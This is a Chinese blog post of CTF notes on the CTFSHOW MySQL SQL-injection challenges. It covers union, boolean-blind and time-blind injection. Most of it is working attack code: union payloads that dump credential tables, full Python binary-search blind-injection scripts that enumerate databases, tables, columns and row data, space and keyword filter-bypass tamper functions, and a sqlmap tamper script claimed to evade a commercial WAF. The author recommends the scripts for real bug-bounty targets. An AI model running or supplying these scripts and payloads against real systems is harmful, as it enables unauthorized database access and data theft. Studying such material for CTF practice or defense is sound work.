各类型数据库sql注入payload大全
柯大佬的mysql_sql注入笔记
柯大佬的其它数据库_sql注入笔记
各种WAF绕过手法学习
WAF绕过总结
[CTFSHOW]Mysql_SQL注入
web171联合注入
——————————————————————————————————只会用sqlmap是没有灵魂的
从回显内容上来看,SQL注入只分为联合注入,报错注入,盲注,堆叠注入。1,联合注入
联合注入是使用了union select联合查询,通常用来拼接在where后面,如下。
sql语句为。
select * from news where id = $id;#闭合select * from news where id = 1' and 1=1 --select * from news where id = 1 order by 4select * from news where id = -1 union select 1,2,3,4select * from news where id = -1 union select user(),2,3,4
进而爆库,表,列,值。
#爆全部库select * from news where id = -1 union select database(),2,3,4# 查当前数据库select * from news where id = -1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+# 查列名select * from news where id = -1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+# 查字段select * from news where id = -1 union select id,username,password from ctfshow_user --+
联合注入的优势是自带多个显位,可以很快爆出数据,缺点是只能用在select最后处,后面如果还有sql语句就必须注释掉。而且必须用到union和select,很容易被拦截。
web172~173查得的不得含flag,解hex ,base64
尝试编码很多:hex ,base64…
-1' union select to_base64(username),hex(password) from ctfshow_user2 --+
hex在线解码网址,点我
web174布尔盲注二分法常用脚本
直接脚本跑,二分法比普通的快多了,可抽取对应的函数跑对应内容,绕狗时加tamper或自行改payload即可,挖src时很多时候sqlamp没法跑,这脚本相对灵活,主要注释多//0.0
# @Author:challengerimport requestsimport optparse# 存放数据库名变量DBName = ""# 存放数据库表变量DBTables = []# 存放数据库字段变量DBColumns = []# 存放数据字典变量,键为字段名,值为字段数据列表DBData = {}# 设置重连次数以及将连接改为短连接# 防止因为HTTP连接数过多导致的 Max retries exceeded with urlrequests.adapters.DEFAULT_RETRIES = 5conn = requests.session()conn.keep_alive = False# 若页面返回真,则会出现adminflag = "admidddn"#返回的Content-Length:Length=102#payload的替换def tamper(payload):tamp={" ":"/**/","select":"sElect"}for k,v in tamp.items():payload = payload.replace(k, v)return payload# 盲注主函数def StartSqli(url):GetDBName(url)print("[+]当前数据库名:{0}".format(DBName))GetDBTables(url, DBName)print("[+]数据库{0}的表如下:".format(DBName))for item in range(len(DBTables)):print("(" + str(item + 1) + ")" + DBTables[item])tableIndex = int(input("[*]请输入要查看表的序号:")) - 1GetDBColumns(url, DBName, DBTables[tableIndex])while True:print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))for item in range(len(DBColumns)):print("(" + str(item + 1) + ")" + DBColumns[item])columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1if (columnIndex == -1):breakelse:GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])# 获取数据库名函数def GetDBName(url):# 引用全局变量DBName,用来存放网页当前使用的数据库名global DBNameprint("[-]开始获取数据库名长度")# 保存数据库名长度变量DBNameLen = 0# 用于检查数据库名长度的payloadpayload = "' and if(length(database())={0},1,0) %23"payload = tamper(payload)# 把URL和payload进行拼接得到最终的请求URLtargetUrl = url + payload# 用for循环来遍历请求,得到数据库名长度for DBNameLen in range(1, 99):# 对payload中的参数进行赋值猜解res = conn.get(targetUrl.format(DBNameLen))# 判断flag是否在返回的页面中if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):print("[+]数据库名长度:" + str(DBNameLen))breakprint("[-]开始获取数据库名")# a表示substr()函数的截取起始位置for i in range(1, DBNameLen + 1):# b表示33~127位ASCII中可显示字符low = 32high = 128while low < high:mid = (low + high) // 2content = "database()" #查询语句payload = f"' and 1=if(ascii(substr(({content}),{i},1))<{mid},1,0)--+"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl)if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):high = midelse:low = mid + 1if low == high == 32:print("[-]"+"No result")breakDBName += chr((high + low - 1) // 2)print("[+]"+str(DBName))# 获取数据库表函数def GetDBTables(url, dbname):global DBTables# 存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))# 获取数据库表数量的payloadpayload = "' and 1=if((select COUNT(table_name) from information_schema.tables where table_schema='{0}')={1},1,0) %23"payload = tamper(payload)targetUrl = url + payload# 开始遍历获取数据库表的数量for DBTableCount in range(1, 99):res = conn.get(targetUrl.format(dbname, DBTableCount))if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0, DBTableCount):print("[-]正在获取第{0}个表名".format(a + 1))# 先获取当前表名的长度for tableLen in range(1, 99):payload = "' and 1=if((select LENGTH(table_name) from information_schema.tables where table_schema='{0}' limit {1},1)={2},1,0) %23"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl.format(dbname, a, tableLen))if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen + 1):low = 32high = 128while low < high:mid = (low + high) // 2payload = f"' and 1=if(ascii(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),{b},1))<{mid},1,0) --+"payload = tamper(payload)targetUrl = url +payloadres = conn.get(targetUrl)if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):high = midelse:low = mid + 1if low == high == 32:print("[-] No result")breaktable += chr((high + low - 1) // 2)print("[+]"+str(table))# 把获取到的名加入到DBTablesDBTables.append(table)# 清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):payload = "' and 1=if((select count(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}')={2},1,0) %23"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl.format(dbname, dbtable, DBColumnCount))if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a + 1))# 先获取字段的长度for columnLen in range(99):payload = "' and 1=if((select length(column_name) from information_schema.columns where table_schema='{0}' and table_name='{1}' limit {2},1)={3},1,0) %23"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl.format(dbname, dbtable, a, columnLen))if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):break# b表示当前字段名猜解的位置for b in range(1, columnLen + 1):low = 32high = 128while low < high:mid = (low + high) // 2payload =f"' and 1=if(ascii(substr((select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{dbtable}' limit {a},1),{b},1))<{mid},1,0) %23"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl)if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):high = midelse:low = mid + 1if low == high == 32:print("[-] No result")breakcolumn += chr((high + low - 1) // 2)print("[+]" + str(column))# 把获取到的名加入到DBColumnsDBColumns.append(column)# 清空column,用来继续获取下一个字段名column = ""# 获取字段下内容数据函数def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "' and 1=if((select count({0}) from {1})={2},1,0) %23"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, DBDataCount))if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))# 先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "' and 1=if((select length({0}) from {1} limit {2},1)={3},1,0) %23"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl.format(dbcolumn, dbtable, a, dataLen))if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))break# 临时存放数据内容变量data = ""# 开始获取数据的具体内容# b表示当前数据内容猜解的位置for b in range(1, dataLen + 1):low = 32high = 128while low < high:mid = (low + high) // 2payload = f"' and 1=if(ascii(substr((select {dbcolumn} from {dbtable} limit {a},1),{b},1))<{mid},1,0) %23"payload = tamper(payload)targetUrl = url + payloadres = conn.get(targetUrl)if (flag in res.content.decode("utf-8")) or (len(res.content) == Length):high = midelse:low = mid + 1if low == high == 32:print("[-] No result")breakdata += chr((high + low - 1) // 2)print("[+]" + str(data))# 放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn, []).append(data)print(DBData)# 把data清空来,继续获取下一个数据data = ""if __name__ == '__main__':"""parser = optparse.OptionParser('usage: python %prog -u url \n\n''Example: python %prog -u http://192.168.61.1/sql/Less-8/?id=1\n')# 目标URL参数-uparser.add_option('-u', '--url', dest='targetURL', default='http://127.0.0.1/sql/Less-8/?id=1', type='string',help='target URL')(options, args) = parser.parse_args()StartSqli(options.targetURL)"""targetURL="http://98c61897-966c-4bd7-83cd-15af8904f807.challenge.ctf.show:8080/api/v4.php?id=1"StartSqli(targetURL)
常用单个布尔盲注二分法:
import requestsurl = "http://1b72b797-7c95-4d80-a914-91cef1de3acf.challenge.ctf.show:8080/api/v4.php?id=1' and 1="flag = ""for i in range(1,100):low = 32high = 128while low < high:mid = (low + high)//2content = "select password from ctfshow_user4 limit 24,1"sql = f"if(ascii(substr(({content}),{i},1))<{mid},1,0)--+"url2 = url+sql#print(url2)r = requests.get(url2)if "admin" in r.text:#len(r.content) == 50811:high = midelse:low = mid + 1if low == high == 32:print("No result")breakflag += chr((high + low - 1)//2)print(flag)
web175时间盲注二分法常用脚本
# @Author:challenger#!/usr/bin/python3# -*- coding: utf-8 -*-import requestsimport optparseimport time# 存放数据库名变量DBName = ""# 存放数据库表变量DBTables = []# 存放数据库字段变量DBColumns = []# 存放数据字典变量,键为字段名,值为字段数据列表DBData = {}# 设置重连次数以及将连接改为短连接# 防止因为HTTP连接数过多导致的 Max retries exceeded with urlrequests.adapters.DEFAULT_RETRIES = 5conn = requests.session()conn.keep_alive = False#延迟时间t=1#payload的替换def tamper(payload):tamp={" ":"/**/","select":"sElect"}for k,v in tamp.items():payload = payload.replace(k, v)return payload# 盲注主函数def StartSqli(url):GetDBName(url)print("[+]当前数据库名:{0}".format(DBName))GetDBTables(url, DBName)print("[+]数据库{0}的表如下:".format(DBName))for item in range(len(DBTables)):print("(" + str(item + 1) + ")" + DBTables[item])tableIndex = int(input("[*]请输入要查看表的序号:")) - 1GetDBColumns(url, DBName, DBTables[tableIndex])while True:print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))for item in range(len(DBColumns)):print("(" + str(item + 1) + ")" + DBColumns[item])columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1if (columnIndex == -1):breakelse:GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])# 获取数据库名函数def GetDBName(url):# 引用全局变量DBName,用来存放网页当前使用的数据库名global DBNameprint("[-]开始获取数据库名长度")# 保存数据库名长度变量DBNameLen = 0# 用for循环来遍历请求,得到数据库名长度for DBNameLen in range(1, 99):# 用于检查数据库名长度的payloadpayload = f"' and if(length(database())={DBNameLen},sleep({t}),0) %23"payload = tamper(payload)# 把URL和payload进行拼接得到最终的请求URLtargetUrl = url + payload# 开始时间timeStart = time.time()# 开始访问a = conn.get(targetUrl)# 结束时间timeEnd = time.time()# 判断时间差if timeEnd - timeStart >= t:print("[+]数据库名长度:" + str(DBNameLen))breakprint("[-]开始获取数据库名")# a表示substr()函数的截取起始位置for a in range(1, DBNameLen + 1):# 33~127位ASCII中可显示字符low = 32high = 128while low < high:mid = (low + high) // 2content = "database()" #查询语句payload = f"' and if(ascii(substr(({content}),{a},1))<{mid},sleep({t}),0)--+"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:high = midelse:low = mid + 1if low == high == 32:print("[-] No result")breakDBName += chr((high + low - 1) // 2)print("[+]"+DBName)def GetDBTables(url, dbname):global DBTables# 存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))# 开始遍历获取数据库表的数量for DBTableCount in range(1, 99):# 获取数据库表数量的payloadpayload = f"' and if((select count(table_name) from information_schema.tables where table_schema='{dbname}' )={DBTableCount},sleep({t}),0) %23"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0, DBTableCount):print("[-]正在获取第{0}个表名".format(a + 1))# 先获取当前表名的长度for tableLen in range(1, 99):payload = f"' and if((select length(table_name) from information_schema.tables where table_schema='{dbname}' limit {a},1)={tableLen},sleep({t}),0) %23"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:print("[+]第{0}个表的长度:{1}".format(a+1, tableLen))break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen + 1):# 33~127位ASCII中可显示字符low = 32high = 128while low < high:mid = (low + high) // 2payload=f"' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),{b},1))<{mid},sleep({t}),0) --+"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:high = midelse:low = mid + 1if low == high == 32:print("[-] No result")breaktable += chr((high + low - 1) // 2)print("[+]" + table) # 把获取到的名加入到DBTablesDBTables.append(table)# 清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):payload = f"' and if((select count(column_name) from information_schema.columns where table_schema='{dbname}' and table_name='{dbtable}')={DBColumnCount},sleep({t}),0) --+"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a + 1))# 先获取字段的长度for columnLen in range(99):payload = f"' and if((select length(column_name) from information_schema.columns where table_schema='{dbname}' and table_name='{dbtable}' limit {a},1)={columnLen},sleep({t}),0) %23"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:break# b表示当前字段名猜解的位置for b in range(1, columnLen + 1):# 33~127位ASCII中可显示字符low = 32high = 128while low < high:mid = (low + high) // 2payload = f"' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{dbname}' and table_name='{dbtable}' limit {a},1),{b},1))<{mid},sleep({t}),0) %23"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:high = midelse:low = mid + 1if low == high == 32:print("[-] No result")breakcolumn += chr((high + low - 1) // 2)print("[+]" + column)# 把获取到的名加入到DBColumnsDBColumns.append(column)# 清空column,用来继续获取下一个字段名column = ""# 获取表数据函数def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = f"' and if((select count({dbcolumn}) from {dbtable})={DBDataCount},sleep({t}),0) %23"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))# 先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = f"'and if((select length({dbcolumn}) from {dbtable} limit {a},1)={dataLen},sleep({t}),0) %23"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))break# 临时存放数据内容变量data = ""# 开始获取数据的具体内容# b表示当前数据内容猜解的位置for b in range(1, dataLen + 1):# 33~127位ASCII中可显示字符low = 32high = 128while low < high:mid = (low + high) // 2payload = f"' and if(ascii(substr((select {dbcolumn} from {dbtable} limit {a},1),{b},1))<{mid},sleep({t}),0) %23"payload = tamper(payload)targetUrl = url + payloadtimeStart = time.time()res = conn.get(targetUrl)timeEnd = time.time()if timeEnd - timeStart >= t:high = midelse:low = mid + 1if low == high == 32:print("[-] No result")breakdata += chr((high + low - 1) // 2)print("[+]" + data)# 放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn, []).append(data)print(DBData)# 把data清空来,继续获取下一个数据data = ""if __name__ == '__main__':"""parser = optparse.OptionParser('usage: python %prog -u url \n\n''Example: python %prog -u http://192.168.61.1/sql/Less-9/?id=1\n')# 目标URL参数-uparser.add_option('-u', '--url', dest='targetURL', default='http://127.0.0.1/sql/Less-9/?id=1', type='string',help='target URL')(options, args) = parser.parse_args()StartSqli(options.targetURL)"""targetURL="http://63f814d1-a667-4c0e-b113-e4075ac7bf92.challenge.ctf.show:8080/api/v5.php?id=1"StartSqli(targetURL)
常用单个时间盲注二分法:
import timeimport requestsurl = "http://f9e8506c-c20b-45ca-88dd-194108d8f581.challenge.ctf.show:8080/api/v5.php?id=1' and "flag = ""for i in range(1,100):low = 32high = 128while low < high:mid = (low + high)//2content = "select password from ctfshow_user5 limit 24,1"sql = f"if(ascii(substr(({content}),{i},1))<{mid},sleep(1),0)--+"url2 = url+sqltimeStart = time.time()r = requests.get(url2)timeEnd = time.time()if timeEnd - timeStart >= 1: #"admin" in r.text:#len(r.content) == 50811:high = midelse:low = mid + 1if low == high == 32:print("No result")breakflag += chr((high + low - 1)//2)print(flag)
web176~179联合注入大小写,空格*过滤
联合注入,直接替换即可
如:1’//union//select//password,1,1//from//ctfshow_user//where//username//=’flag’%23
#payload的替换def tamper(payload):tamp={" ":"/**/",#web177"select":"sElect",#web176," ":"%09",#web178" ":"%0c",#web179}for k,v in tamp.items():payload = payload.replace(k, v)return payload
web180~182把所有空格都过滤了:
y4大佬的payload:
id=-1'or(id=26)and'1'='1
web183
web184
web185~186
import reimport osfrom lib.core.data import kbfrom lib.core.enums import PRIORITYfrom lib.core.common import singleTimeWarnMessagefrom lib.core.enums import DBMS__priority__ = PRIORITY.LOWdef dependencies():singleTimeWarnMessage("Bypass yunsuo by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))def tamper(payload, **kwargs):payload=payload.replace(" "," ",1)payload=payload.replace(" AND"," REGEXP \"[...%252523]\" and",1)payload=re.sub(r'(ORDER BY \d+)', "x", payload)payload=payload.replace("UNION"," REGEXP \"[...%252523]\" union",1)payload=payload.replace("(SELECT (CASE WHEN ("," REGEXP \"[...%252523]\" (SELECT (CASE WHEN (",1)payload=payload.replace(" AS "," REGEXP \"[...%252523]\" as ",1)payload=payload.replace(" OR "," REGEXP \"[...%252523]\" or ",1)payload=payload.replace(" WHERE "," REGEXP \"[...%252523]\" where ",1)payload=payload.replace("HIGH_RISK_OPERATION:0"," REGEXP \"[...%252523]\" ",1)payload=payload.replace(";","; REGEXP \"[...%252523]\" HTGH",1)payload=payload.replace("||","; || REGEXP \"[...%252523]\" ",1)payload=payload.replace("THEN"," THEN REGEXP \"[...%252523]\" ",1)payload=payload.replace(" IN"," REGEXP \"[...%252523]\" IN ",1)payload=payload.replace("+"," REGEXP \"[...%252523]\" + ",1)payload=payload.replace("WHEN"," REGEXP \"[...%252523]\" ",1)return payload
若有收获,就点个赞吧
0 人点赞
